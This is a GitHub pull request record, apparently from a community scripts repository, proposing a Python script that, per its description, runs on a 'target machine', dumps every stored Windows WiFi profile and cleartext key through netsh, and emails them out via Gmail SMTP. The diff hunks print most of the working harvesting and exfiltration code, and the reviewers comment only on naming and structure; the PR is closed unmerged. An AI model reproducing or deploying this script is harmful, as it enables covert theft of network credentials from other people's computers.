### PR TITLE
Get-Wifi passwords 

### LINKED ISSUE #800: Get WIFI Passwords
**This template is strictly for requesting New Scripts, if you want a new feature (automating this Repo,**
**a change in structure) in the Repo,** 
**or you want to report a Bug. There are other templates which you should follow**

# Description
A Python Script which when Executed on the target machine will send all the WIFI names and their respective passwords stored in it, through Given Email.

## Language
- [x] Python

## Checklist:

- **Details on the Script**

| name            | about                                                  | labels  | assignees                                                      |
| Get WIFI Passwords | A Python Script which when Executed on the target machine will send all the WIFI names and their respective passwords stored in it, through Given Email. |SWOC| @pritamp17 |

### PR DESCRIPTION
**Pull request by pritamp17**
# Description
Python Script which will send all wifi passwords stored on target windows pc through the given email.

Fixes #800 

Replace `issue_no` with the issue number which is fixed in this PR

## Type of change
- [x] New feature (non-breaking change which adds functionality)

# Checklist:

- [x] My code follows the style guidelines(Clean Code) of this project
- [x] I have performed a self-review of my own code
- [x] I have created a helpful and easy to understand `README.md`
- [x] I have made corresponding changes to the documentation
- [x] My changes generate no new warnings
- [x] I have added tests/screenshots(if any) that prove my fix is effective or that my feature works

final-1
final-2

### CODE REVIEW

**Comment by HarshCasper** [comment]
Why is the Anime Scraper and the Wifi Password script added into the PR?

**Comment by pritamp17** [comment]
Sorry for that😅 i will make corrections shortly..

**Comment by pritamp17** [comment]
@HarshCasper I have deleted the Anime tracker folder, do I need to make any other changes?

**Review by sohamsshah — CHANGES_REQUESTED** [review]
Great work @pritamp17 

Please rename `Get-Wifi-Password` to `Get_Wifi_Password` as to follow the naming conventions at the repository.

File: Python/Get-Wifi-Password/finder.py [hunk 1]
```diff
@@ -0,0 +1,31 @@
+import subprocess
+import smtplib
+
+def send_mail(email,password,message):
```
Comment (HarshCasper) [inline Python/Get-Wifi-Password/finder.py:4]: Add a Doctext

File: Python/Get-Wifi-Password/finder.py [hunk 2]
```diff
@@ -0,0 +1,31 @@
...
+	server = smtplib.SMTP("smtp.gmail.com",587)
```
Comment (HarshCasper) [inline Python/Get-Wifi-Password/finder.py:5]: Can this be captured in a `.env` file?

File: Python/Get-Wifi-Password/finder.py [hunk 3]
```diff
@@ -0,0 +1,31 @@
...
+      listi.append("{:<30}|  {:<}".format(i, ""))
+res=""
+for msg in listi:
+    res = res + msg +"\n"
+try:
+    send_mail(email, password, res)
+    print("[+] email successfully sent\n")
+except smtplib.SMTPAuthenticationError:
+    print("[+] Incorrect Email or Password")
+
```
Comment (HarshCasper) [inline Python/Get-Wifi-Password/finder.py:31]: Can we have separate function for basic setup and a separate one for the driver code?

File: Python/Get-Wifi-Password/finder.py [hunk 4]
```diff
@@ -0,0 +1,31 @@
...
+listi = []
+data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
+profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
+for i in profiles:
+    results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
+    results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
+    try:
+        listi.append(("{:<30}|  {:<}".format(i, results[0])))
+    except IndexError:
+      listi.append("{:<30}|  {:<}".format(i, ""))
```
Comment (HarshCasper) [inline Python/Get-Wifi-Password/finder.py:22]: Can you aptly document this part?

**Review by HarshCasper — CHANGES_REQUESTED** [review]

**Comment by vybhav72954** [comment]
@pritamp17 can you provide us with updates

**Pull request closed without merging**